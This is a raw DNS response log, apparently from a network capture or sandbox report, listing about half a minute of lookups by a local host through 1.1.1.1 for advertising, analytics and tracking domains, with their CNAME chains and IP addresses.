                                                                                                                                                                                              Nov 20, 2024 21:28:31.576451063 CET1.1.1.1192.168.2.50xfe44No error (0)stats.g.doubleclick.net66.102.1.157A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:31.576451063 CET1.1.1.1192.168.2.50xfe44No error (0)stats.g.doubleclick.net66.102.1.154A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:31.576451063 CET1.1.1.1192.168.2.50xfe44No error (0)stats.g.doubleclick.net66.102.1.156A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.784214973 CET1.1.1.1192.168.2.50xbea1No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.784214973 CET1.1.1.1192.168.2.50xbea1No error (0)scontent.xx.fbcdn.net157.240.195.15A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.784734964 CET1.1.1.1192.168.2.50x187eNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.784734964 CET1.1.1.1192.168.2.50x187eNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.784734964 CET1.1.1.1192.168.2.50x187eNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.798305035 CET1.1.1.1192.168.2.50x4a61No error (0)d.adroll.comadserver-vpc-alb-0-1210614323.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.798305035 CET1.1.1.1192.168.2.50x4a61No error (0)adserver-vpc-alb-0-1210614323.ap-southeast-1.elb.amazonaws.com52.220.250.182A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.798305035 CET1.1.1.1192.168.2.50x4a61No error (0)adserver-vpc-alb-0-1210614323.ap-southeast-1.elb.amazonaws.com54.255.252.168A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.798367977 CET1.1.1.1192.168.2.50xd7dfNo error (0)d.adroll.comadserver-vpc-alb-3-255995556.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.107848883 CET1.1.1.1192.168.2.50xb4beNo error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.107848883 CET1.1.1.1192.168.2.50xb4beNo error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.107965946 CET1.1.1.1192.168.2.50x2b3dNo error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.107965946 CET1.1.1.1192.168.2.50x2b3dNo error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.107965946 CET1.1.1.1192.168.2.50x2b3dNo error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.251.238.118A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.107965946 CET1.1.1.1192.168.2.50x2b3dNo error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.228.143.86A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.409631968 CET1.1.1.1192.168.2.50xf062No error (0)knrpc.olark.com34.96.127.16A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:36.449421883 CET1.1.1.1192.168.2.50x3597No error (0)knrpc.olark.com34.96.127.16A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:37.074604034 CET1.1.1.1192.168.2.50x29ceNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:37.074604034 CET1.1.1.1192.168.2.50x29ceNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:37.074604034 CET1.1.1.1192.168.2.50x29ceNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:37.074937105 CET1.1.1.1192.168.2.50x2aeeNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:37.074937105 CET1.1.1.1192.168.2.50x2aeeNo error (0)scontent.xx.fbcdn.net157.240.195.15A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.251085043 CET1.1.1.1192.168.2.50x87eaNo error (0)static.olark.comstatic.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.251085043 CET1.1.1.1192.168.2.50x87eaNo error (0)static.wac.5025.rhocdn.netfp2e04.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.251085043 CET1.1.1.1192.168.2.50x87eaNo error (0)fp2e04.wac.5025.rhocdn.netfp2e04.wac.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.311230898 CET1.1.1.1192.168.2.50xa280No error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.311230898 CET1.1.1.1192.168.2.50xa280No error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.311230898 CET1.1.1.1192.168.2.50xa280No error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.228.143.86A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.311230898 CET1.1.1.1192.168.2.50xa280No error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.251.238.118A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.311681986 CET1.1.1.1192.168.2.50x5245No error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.311681986 CET1.1.1.1192.168.2.50x5245No error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.322837114 CET1.1.1.1192.168.2.50x795bNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.327004910 CET1.1.1.1192.168.2.50xfea1No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.327004910 CET1.1.1.1192.168.2.50xfea1No error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.334168911 CET1.1.1.1192.168.2.50x6100No error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.339232922 CET1.1.1.1192.168.2.50xd842No error (0)static.olark.comstatic.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.339232922 CET1.1.1.1192.168.2.50xd842No error (0)static.wac.5025.rhocdn.netfp2e04.wac.5025.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.339232922 CET1.1.1.1192.168.2.50xd842No error (0)fp2e04.wac.5025.rhocdn.netfp2e04.wac.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.339232922 CET1.1.1.1192.168.2.50xd842No error (0)fp2e04.wac.rhocdn.net192.229.233.34A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.477715969 CET1.1.1.1192.168.2.50xc864No error (0)cm.g.doubleclick.net142.250.181.66A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.478842974 CET1.1.1.1192.168.2.50x75d1No error (0)dsum-sec.casalemedia.com104.18.26.193A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.478842974 CET1.1.1.1192.168.2.50x75d1No error (0)dsum-sec.casalemedia.com104.18.27.193A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.481435061 CET1.1.1.1192.168.2.50xb1d8No error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:40.008582115 CET1.1.1.1192.168.2.50x5b78No error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:40.008582115 CET1.1.1.1192.168.2.50x5b78No error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:40.008582115 CET1.1.1.1192.168.2.50x5b78No error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.251.238.118A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:40.008582115 CET1.1.1.1192.168.2.50x5b78No error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.228.143.86A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:40.008786917 CET1.1.1.1192.168.2.50x89efNo error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:40.008786917 CET1.1.1.1192.168.2.50x89efNo error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:41.400372982 CET1.1.1.1192.168.2.50x7b6No error (0)idsync.rlcdn.com35.244.154.8A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:41.916280031 CET1.1.1.1192.168.2.50x2678No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:41.916299105 CET1.1.1.1192.168.2.50x7cd9No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.206415892 CET1.1.1.1192.168.2.50xd9aeNo error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.206415892 CET1.1.1.1192.168.2.50xd9aeNo error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.206415892 CET1.1.1.1192.168.2.50xd9aeNo error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.228.143.86A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.206415892 CET1.1.1.1192.168.2.50xd9aeNo error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.251.238.118A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.206571102 CET1.1.1.1192.168.2.50x9fa0No error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.206571102 CET1.1.1.1192.168.2.50x9fa0No error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.992465019 CET1.1.1.1192.168.2.50xb321No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.992465019 CET1.1.1.1192.168.2.50xb321No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.992465019 CET1.1.1.1192.168.2.50xb321No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:42.992465019 CET1.1.1.1192.168.2.50xb321No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.186544895 CET1.1.1.1192.168.2.50xdac1No error (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.187179089 CET1.1.1.1192.168.2.50xea90No error (0)dsum-sec.casalemedia.com104.18.27.193A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.187179089 CET1.1.1.1192.168.2.50xea90No error (0)dsum-sec.casalemedia.com104.18.26.193A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.389421940 CET1.1.1.1192.168.2.50x3454No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.389458895 CET1.1.1.1192.168.2.50x75efNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:43.389458895 CET1.1.1.1192.168.2.50x75efNo error (0)user-data-eu.bidswitch.net35.214.136.108A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.688198090 CET1.1.1.1192.168.2.50x5609No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.688627958 CET1.1.1.1192.168.2.50x81cbNo error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:44.887494087 CET1.1.1.1192.168.2.50xf609No error (0)api.olark.com34.96.127.16A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.067447901 CET1.1.1.1192.168.2.50x6cfcNo error (0)pippio.com107.178.254.65A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.730283022 CET1.1.1.1192.168.2.50xdfcfNo error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.730283022 CET1.1.1.1192.168.2.50xdfcfNo error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.956392050 CET1.1.1.1192.168.2.50x272dNo error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.956392050 CET1.1.1.1192.168.2.50x272dNo error (0)alldcs.outbrain.orgwndc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.956392050 CET1.1.1.1192.168.2.50x272dNo error (0)wndc1.outbrain.org52.250.45.119A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.956422091 CET1.1.1.1192.168.2.50xe047No error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:45.956422091 CET1.1.1.1192.168.2.50xe047No error (0)alldcs.outbrain.orgwndc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.764219999 CET1.1.1.1192.168.2.50xc989No error (0)api.olark.com34.96.127.16A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.966733932 CET1.1.1.1192.168.2.50xeb7cNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.966733932 CET1.1.1.1192.168.2.50xeb7cNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.967669010 CET1.1.1.1192.168.2.50xa5f8No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:46.967669010 CET1.1.1.1192.168.2.50xa5f8No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.293265104 CET1.1.1.1192.168.2.50xd30No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.293265104 CET1.1.1.1192.168.2.50xd30No error (0)image2v2.pubmnet.compug-sin12.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.293265104 CET1.1.1.1192.168.2.50xd30No error (0)pug-sin12.pubmnet.com207.65.33.82A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.418404102 CET1.1.1.1192.168.2.50xb4daNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.418404102 CET1.1.1.1192.168.2.50xb4daNo error (0)dcs-ups.g03.yahoodns.net77.238.180.12A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.418404102 CET1.1.1.1192.168.2.50xb4daNo error (0)dcs-ups.g03.yahoodns.net77.238.180.11A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.504640102 CET1.1.1.1192.168.2.50x8490No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.504640102 CET1.1.1.1192.168.2.50x8490No error (0)image2v2.pubmnet.compug-sin12.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:47.644828081 CET1.1.1.1192.168.2.50xd70aNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.055370092 CET1.1.1.1192.168.2.50xbfdaNo error (0)log.olark.comlog1.olark.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.055370092 CET1.1.1.1192.168.2.50xbfdaNo error (0)log1.olark.com34.96.127.16A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.058214903 CET1.1.1.1192.168.2.50x6caaNo error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.058214903 CET1.1.1.1192.168.2.50x6caaNo error (0)alldcs.outbrain.orgwndc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.058214903 CET1.1.1.1192.168.2.50x6caaNo error (0)wndc1.outbrain.org52.250.45.119A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.058675051 CET1.1.1.1192.168.2.50xd317No error (0)sync.outbrain.comalldcs.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.058675051 CET1.1.1.1192.168.2.50xd317No error (0)alldcs.outbrain.orgwndc1.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.075865984 CET1.1.1.1192.168.2.50x169bNo error (0)log.olark.comlog1.olark.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:48.909657001 CET1.1.1.1192.168.2.50x70cfNo error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:49.260477066 CET1.1.1.1192.168.2.50xe989No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:49.260477066 CET1.1.1.1192.168.2.50xe989No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:50.053572893 CET1.1.1.1192.168.2.50xa6b5No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:50.053572893 CET1.1.1.1192.168.2.50xa6b5No error (0)image2v2.pubmnet.compug-sin12.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:50.053572893 CET1.1.1.1192.168.2.50xa6b5No error (0)pug-sin12.pubmnet.com207.65.33.82A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:50.054308891 CET1.1.1.1192.168.2.50x5bcbNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:50.054308891 CET1.1.1.1192.168.2.50x5bcbNo error (0)image2v2.pubmnet.compug-sin12.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:50.054727077 CET1.1.1.1192.168.2.50x984fNo error (0)log.olark.comlog1.olark.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:50.054862022 CET1.1.1.1192.168.2.50x3b55No error (0)log.olark.comlog1.olark.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:50.054862022 CET1.1.1.1192.168.2.50x3b55No error (0)log1.olark.com34.96.127.16A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.385982037 CET1.1.1.1192.168.2.50x92aeNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.385982037 CET1.1.1.1192.168.2.50x92aeNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.386001110 CET1.1.1.1192.168.2.50x402bNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.386001110 CET1.1.1.1192.168.2.50x402bNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.508469105 CET1.1.1.1192.168.2.50xb902No error (0)sync.taboola.comil-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.508469105 CET1.1.1.1192.168.2.50xb902No error (0)il-vip001.taboola.com185.106.33.48A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.508606911 CET1.1.1.1192.168.2.50x1399No error (0)sync.taboola.comil-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.513534069 CET1.1.1.1192.168.2.50xbb6eNo error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.513638020 CET1.1.1.1192.168.2.50x14f7No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.513638020 CET1.1.1.1192.168.2.50x14f7No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.513638020 CET1.1.1.1192.168.2.50x14f7No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.560858011 CET1.1.1.1192.168.2.50x36f0No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.560858011 CET1.1.1.1192.168.2.50x36f0No error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.560858011 CET1.1.1.1192.168.2.50x36f0No error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.560858011 CET1.1.1.1192.168.2.50x36f0No error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.560858011 CET1.1.1.1192.168.2.50x36f0No error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.560858011 CET1.1.1.1192.168.2.50x36f0No error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.560858011 CET1.1.1.1192.168.2.50x36f0No error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:51.560858011 CET1.1.1.1192.168.2.50x36f0No error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:54.788640976 CET1.1.1.1192.168.2.50x1247No error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:54.788640976 CET1.1.1.1192.168.2.50x1247No error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:54.788640976 CET1.1.1.1192.168.2.50x1247No error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.251.238.118A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:54.788640976 CET1.1.1.1192.168.2.50x1247No error (0)sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.com13.228.143.86A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:54.789627075 CET1.1.1.1192.168.2.50xef64No error (0)x.adroll.comap-southeast-1-x.adroll.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:54.789627075 CET1.1.1.1192.168.2.50xef64No error (0)ap-southeast-1-x.adroll.comsludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.081882954 CET1.1.1.1192.168.2.50x81d7No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.081882954 CET1.1.1.1192.168.2.50x81d7No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.081882954 CET1.1.1.1192.168.2.50x81d7No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.082063913 CET1.1.1.1192.168.2.50x1d63No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.099944115 CET1.1.1.1192.168.2.50xd4b2No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.099944115 CET1.1.1.1192.168.2.50xd4b2No error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.099944115 CET1.1.1.1192.168.2.50xd4b2No error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:56.099944115 CET1.1.1.1192.168.2.50xd4b2No error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
